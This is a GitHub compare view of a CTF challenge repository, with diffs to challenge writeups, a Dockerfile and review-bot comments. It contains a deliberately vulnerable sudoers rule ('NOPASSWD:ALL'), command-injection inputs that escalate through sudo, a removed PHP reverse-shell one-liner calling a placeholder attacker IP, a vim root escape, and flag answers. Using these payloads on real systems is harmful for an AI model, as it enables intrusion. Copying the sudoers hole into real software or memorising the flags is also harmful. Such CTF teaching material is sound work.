Compare commits
29 Commits
GZ---Chall
...
main
@@ -1,3 +1,5 @@
|
||||
# GiTxHextech-Challenge-Repo
|
||||
|
||||
This will be the repo for submitted challenges, view folder to see accepted categories
|
||||
This is the challenge repository of the CTF challenges that were used during the CTF competition held in RP.
|
||||
|
||||
For any repo/general CTF questions, please PM malkbr3d on Discord
|
||||
|
||||
4
challenges/README.md
Normal file
@@ -0,0 +1,4 @@
|
||||
## Information
|
||||
|
||||
writeup.md consists of solutions from the respective challenge authors.
|
||||
readme.md holds overall general information about the challenge.
|
||||
@@ -1,3 +0,0 @@
|
||||
This dir contains challenges that are related to blockchain
|
||||
|
||||
##### note: am aware that most (or all idk) are not familiar with blockchain category, however due to the nature of the CTF(open to all SOI body), we will try to be inclusive. If there are no submitted blockchain challenges, this category will be removed as a whole.
|
||||
@@ -2,7 +2,7 @@ From the description, a location name is hidden using a secret phrase.
|
||||
- Grab the 3 words mentioned in capital letters in the description.
|
||||
- Give the 3 words in what3words site url or in the search box (https://what3words.com/treasured.island.quest)
|
||||
|
||||
The location of the place is shown at the bottom.
|
||||
The location of the place is shown at the bottom. (flag is in the search result)
|
||||
|
||||
<img width="298" alt="image" src="https://github.com/lenebread/GiTxHextech-Challenge-Repo/assets/166520861/70a27c50-f138-404b-8b08-350ac2e689f7">
|
||||
<img width="931" alt="image" src="https://github.com/lenebread/GiTxHextech-Challenge-Repo/assets/166520861/85c4ce53-3468-49f0-93d0-1f6ad217a544">
|
||||
|
||||
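Review bot: the amended line "The location of the place is shown at the bottom. (flag is in the search result)" still does not state the flag, while the other writeups in this compare end with an explicit "The flag is: ..." line. Add the flag value, or at least its format, so the solution can be checked without visiting what3words.com. The two `<img>` tags in the trailing context load from a github.com user-assets URL, whereas the other writeups reference relative `./images/` files; committing the screenshots next to the writeup would keep it self-contained.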
@@ -8,7 +8,7 @@ RUN echo "HEX{N3tw0rK_ErR_500_W1kS2kKiL}" > /root/flag.txt
|
||||
RUN chown www-data:www-data /var/www/
|
||||
|
||||
# Add www-data to sudoers file for vim command
|
||||
RUN echo 'www-data ALL=(ALL) NOPASSWD:/usr/bin/vim' >> /etc/sudoers
|
||||
RUN echo 'www-data ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
|
||||
|
||||
# Copy the PHP script to the /var/www/html directory
|
||||
COPY index.php /var/www/html/index.php
|
||||
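Review bot: the context comment `# Add www-data to sudoers file for vim command` no longer matches the rule below it, which now grants `NOPASSWD:ALL` instead of `NOPASSWD:/usr/bin/vim`. Update the comment to say that www-data gets unrestricted passwordless sudo on purpose for this challenge, so nobody reusing this Dockerfile as a base assumes a vim-only rule. The entry is also appended to /etc/sudoers with `>>`; a drop-in file under /etc/sudoers.d checked with `visudo -c` during the build would make a malformed entry fail the build rather than break sudo at runtime.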
@@ -19,4 +19,4 @@ RUN sed -i 's/80/52002/g' /etc/apache2/ports.conf /etc/apache2/sites-available/0
|
||||
# Start apache2 and cron in the foreground
|
||||
CMD service apache2 start && cron -f
|
||||
|
||||
EXPOSE 52002
|
||||
EXPOSE 52002
|
||||
|
||||
@@ -7,7 +7,7 @@ Check out this simple HTTP status checker I made!
|
||||
- Author: Goh Zavier
|
||||
- Discord Username: gzavz
|
||||
- Category: Web
|
||||
- Diffculty: Medium
|
||||
- Diffculty: Easy
|
||||
|
||||
## Hints
|
||||
|
||||
|
||||
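Review bot: the changed line `- Diffculty: Easy` carries over the misspelling from the line it replaces; since this line is being touched anyway, correct it to `- Difficulty: Easy`. The downgrade from Medium to Easy is consistent with the sudoers change in the Dockerfile, and a short mention of that in the commit message would explain why the rating moved.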
|
@@ -8,38 +8,16 @@ Entering a semi-colon (;) will break the command. We can try to use the payload
|
||||
|
||||

|
||||
|
||||
We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot.
|
||||
We can attempt to use the command ``; sudo -l``. We can see that we are able to run any command as sudo without a password as seen in the followings screenshot.
|
||||
|
||||

|
||||

|
||||
|
||||
Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address.
|
||||
We can attempt to use the command ``; sudo ls /root/`` to list the root directory. We can see that there is a file called ``flag.txt`` as seen in the following screenshot.
|
||||
|
||||
```
|
||||
; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
```
|
||||

|
||||
|
||||
Input the above payload into the input box as seen in the following screenshot.
|
||||
We can read the contents of the file by using the command ``cat /roo/flag.txt``.
|
||||
|
||||

|
||||

|
||||
|
||||
Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot.
|
||||
|
||||

|
||||
|
||||
We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. We can use the command ``sudo -l`` and see that we can run the command ``vim`` as root without a password as seen in the following screenshot.
|
||||
|
||||

|
||||
|
||||
Using GTFOBins, we are able to breakout and obtain a shell as a root user using the following command:
|
||||
|
||||
```
|
||||
vim -c ':!/bin/sh'
|
||||
```
|
||||
|
||||
Using the command ``whoami`` we can see that we are now the root user as seen in the following screenshot.
|
||||
|
||||

|
||||
|
||||
We can obtain the flag in the root directory by using the command ``cd /root`` and ``cat flag.txt``.
|
||||
|
||||
The flag is ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``.
|
||||
The flag is: ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``
|
||||
|
||||
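Review bot: in the new final step, ``cat /roo/flag.txt`` misspells the path and drops the `; sudo` prefix that the two preceding steps use (``; sudo -l`` and ``; sudo ls /root/``). The Dockerfile writes the flag to /root/flag.txt, so the step should read `; sudo cat /root/flag.txt` to match what a reader has to type into the input box. In the ``; sudo -l`` step, "followings screenshot" should be "following screenshot".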
BIN
challenges/web/web warm-up/images/img-1.png
Normal file
|
After Width: | Height: | Size: 23 KiB |
BIN
challenges/web/web warm-up/images/img-2.png
Normal file
|
After Width: | Height: | Size: 19 KiB |
23
challenges/web/web warm-up/writeup.md
Normal file
@@ -0,0 +1,23 @@
|
||||
This challenge requires you to view source of the HTML pages. There are two ways to complete this.
|
||||
|
||||
# First Method
|
||||
|
||||
Navigate to the challenge link. We are provided with a site that says to read the description again. Alternatively, we can also view the page source and see that there is a hidden text that links to another page called "why.html" as seen in the following screenshot.
|
||||
|
||||

|
||||
|
||||
Once on the "why.html" page, we are given a hint as to how we can obtain the flag.
|
||||
|
||||
Viewing the page source again and we are able to see that our flag is hidden on the page as seen in the following screenshot.
|
||||
|
||||

|
||||
|
||||
The flag is: ``HEX{B@s1c_w3B_012siXJv}``
|
||||
|
||||
# Second Method
|
||||
|
||||
Reading the description, we can see that there is a text called ``why.html``. This can be a hint and we can attempt to navigate to the page called ``why.html``.
|
||||
|
||||
Upon navigating to it, we are given a hint as to how we can obtain the flag. We can obtain it by viewing the page source.
|
||||
|
||||
The flag is: ``HEX{B@s1c_w3B_012siXJv}``
|
||||
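Review bot: under "First Method", the sentence starting "Alternatively, we can also view the page source" has nothing before it to be an alternative to, and it is the one step that separates this method from the second (finding why.html through the hidden text in the source rather than from the description). Drop "Alternatively" and state it as the step. Both method headings use a top-level `#` in a file that has no title; a title line with `##` for the methods would match the `## Information` style in challenges/README.md.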